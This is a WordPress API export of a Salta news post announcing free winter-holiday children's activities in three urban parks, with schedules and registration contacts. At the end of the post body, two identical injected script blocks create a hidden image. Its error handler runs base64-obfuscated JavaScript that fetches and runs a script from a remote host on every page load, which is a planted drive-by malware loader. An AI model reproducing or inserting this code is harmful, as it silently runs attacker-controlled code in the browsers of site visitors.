{"id":4183,"date":"2024-07-10T13:48:00","date_gmt":"2024-07-10T16:48:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4183"},"modified":"2025-08-13T23:53:04","modified_gmt":"2025-08-14T02:53:04","slug":"vivi-las-vacaciones-de-invierno-en-los-parques-urbanos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4183","title":{"rendered":"Viv\u00ed las vacaciones de invierno en los Parques Urbanos"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-e297e639023da9791535bce84a20e606\" style=\"background-color:#880324\"><em>Se organiz\u00f3 una agenda repleta de actividades especiales para que ni\u00f1os y ni\u00f1as disfruten durante estas vacaciones. Son gratuitas y en su mayor\u00eda requieren inscripci\u00f3n previa ya que son con cupos limitados.<\/em><\/h4>\n\n\n\n<p>Durante estas vacaciones de invierno, los Parques Urbanos proponen un sinf\u00edn de opciones, para todas las edades, que se podr\u00e1n vivir y disfrutar de forma gratuita y en su mayor\u00eda con inscripci\u00f3n previa y cupo limitado.<\/p>\n\n\n\n<p>Se recuerda que el horario de invierno de los parques es de 8 a 20hs.<\/p>\n\n\n\n<p>En el&nbsp;<strong>Parque Bicentenario<\/strong>&nbsp;se realizar\u00e1n distintas actividades, quienes deseen participar se podr\u00e1n inscribir v\u00eda mail a&nbsp;<a href=\"http:\/\/calderete@parquesurbanos.gob.ar\/\">http:\/\/calderete@parquesurbanos.gob.ar<\/a><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Jueves 11 y Viernes 12 de 16 a 17:30hs. \u201cAvistaje de Aves para chicos y grandes\u201d, se realiza en la fuente rotonda principal. Sin cupo ni inscripci\u00f3n.<\/li>\n\n\n\n<li>Viernes 12 a las 11:30hs. \u201cTaller S\u00faper H\u00e9roes\u201d en la carpa blanca frente al Domo. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>S\u00e1bado 13 a las 9hs. \u201cAvistaje de Aves para chicos y grandes\u201d, se realiza en la fuente rotonda principal. Sin cupo ni inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>16 a 18hs. \u201cJuegos en Familia\u201d en el play\u00f3n deportivo. Sin cupo ni inscripci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Jueves 18 de 16 a 17:30hs. \u201cAvistaje de Aves para chicos y grandes\u201d, se realiza en la fuente rotonda principal. Sin cupo ni inscripci\u00f3n.<\/li>\n\n\n\n<li>Viernes 19 a las 11:30hs. \u201cTaller S\u00faper H\u00e9roes\u201d en la carpa blanca frente al Domo. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>16 a 18hs. \u201cCharla de Iniciaci\u00f3n al Avistaje de Aves\u201d en Domo. Sin cupo ni inscripci\u00f3n. Dictado por Club de Observadores de Aves Salta.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>S\u00e1bado 20 de 9 a 12hs. \u201cPr\u00e1ctica de Avistaje de Aves\u201d en la fuente de la rotonda principal. Sin cupo ni inscripci\u00f3n. Dictado por Club de Observadores de Aves Salta.<\/li>\n\n\n\n<li>S\u00e1bado 20 y domingo 21 de 14 a 19hs. \u201cEn Vacaciones descubr\u00ed las Aves\u201d en Domo. Habr\u00e1 una muestra de pinturas de artistas invitados, una muestra fotogr\u00e1fica de aves de Salta, un stand de libros y cuentos infantiles sobre Aves y una plaza de juegos para los ni\u00f1os y pinturas de aves.<\/li>\n<\/ul>\n\n\n\n<p>En el caso del&nbsp;<strong>Parque de la Familia&nbsp;<\/strong>para participar de los talleres, que se realizar\u00e1n en el SUM, se deben inscribir de lunes a viernes de 9 a 13hs. comunic\u00e1ndose al &nbsp;2232966.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mi\u00e9rcoles 10 de 11:30 a 13:30hs. \u201cTaller S\u00faper H\u00e9roes\u201d. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Jueves 11 de 11 a 13hs. \u201cPeque\u00f1os jardineros: Taller de plantitas decorativas\u201d. Cupo 20 ni\u00f1os de 9 a 15 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>16 a 18hs. \u201cTaller de Domin\u00f3: Crea y arma el tuyo\u201d. Cupo 20 ni\u00f1os de 9 a 15 a\u00f1os, requiere inscripci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Viernes 12 de 17:30 a 19:30hs. Cine para toda la familia. Sin cupo ni inscripci\u00f3n.<\/li>\n\n\n\n<li>Martes 16 de 16 a 18hs. Taller Fofulapiz de las emociones. Cupo 20 ni\u00f1os de 9 a 15 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Mi\u00e9rcoles 17 de 11:30 a 13:30hs. \u201cTaller S\u00faper H\u00e9roes\u201d. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Jueves 18 de 11 a 13hs. \u201cTesoro creativo: Taller de monederos ecol\u00f3gicos\u201d. Cupo 20 ni\u00f1os de 9 a 15 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Viernes 19 de 17:30 a 19:30hs. Cine m\u00f3vil \u2013 Pelis para toda la familia. Sin cupo ni inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>El&nbsp;<strong>Parque Sur<\/strong>&nbsp;ofrecer\u00e1 diferentes talleres para ni\u00f1os, los mismos se realizar\u00e1n en el Anfiteatro, el tel\u00e9fono para registrar inscripci\u00f3n por WhatsApp es 387 4567871.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Mi\u00e9rcoles 10 de 15:30 a 17:30hs. Recreaci\u00f3n y juegos. Cupo 25 ni\u00f1os de 6 a 12 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Jueves 11 de 11:30 a 13hs. \u201cTaller S\u00faper H\u00e9roes\u201d. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<p>16 a 19hs. Talleres Porta Maceta. Cupo 15 ni\u00f1os de 8 a 14 a\u00f1os, requiere inscripci\u00f3n.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Viernes 12 de 16 a 19hs. Talleres Llavero de Cactus. Cupo 15 ni\u00f1os de 8 a 14 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Mi\u00e9rcoles 17 de 15:30 a 17:30hs. Recreaci\u00f3n y juegos. Cupo 25 ni\u00f1os de 6 a 12 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Mi\u00e9rcoles 17 y Jueves 18 de 16 a 19hs. Taller de Tejido a Crochet. Cupo 12 ni\u00f1os desde los 15 a\u00f1os en adelante, requiere inscripci\u00f3n.<\/li>\n\n\n\n<li>Jueves 18 de 11:30 a 13:00. \u201cTaller S\u00faper H\u00e9roes\u201d. Cupo 20 ni\u00f1os de 6 a 10 a\u00f1os, requiere inscripci\u00f3n.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se organiz\u00f3 una agenda repleta de actividades especiales para que ni\u00f1os y ni\u00f1as disfruten durante estas vacaciones. Son gratuitas y en su mayor\u00eda requieren inscripci\u00f3n previa ya que son con cupos limitados. Durante estas vacaciones de invierno, los Parques Urbanos proponen un sinf\u00edn de opciones, para todas las edades, que se podr\u00e1n vivir y disfrutar [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4184,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[17],"tags":[],"class_list":{"0":"post-4183","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4183"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4183"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4183\/revisions"}],"predecessor-version":[{"id":6745,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4183\/revisions\/6745"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4184"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4183"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4183"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}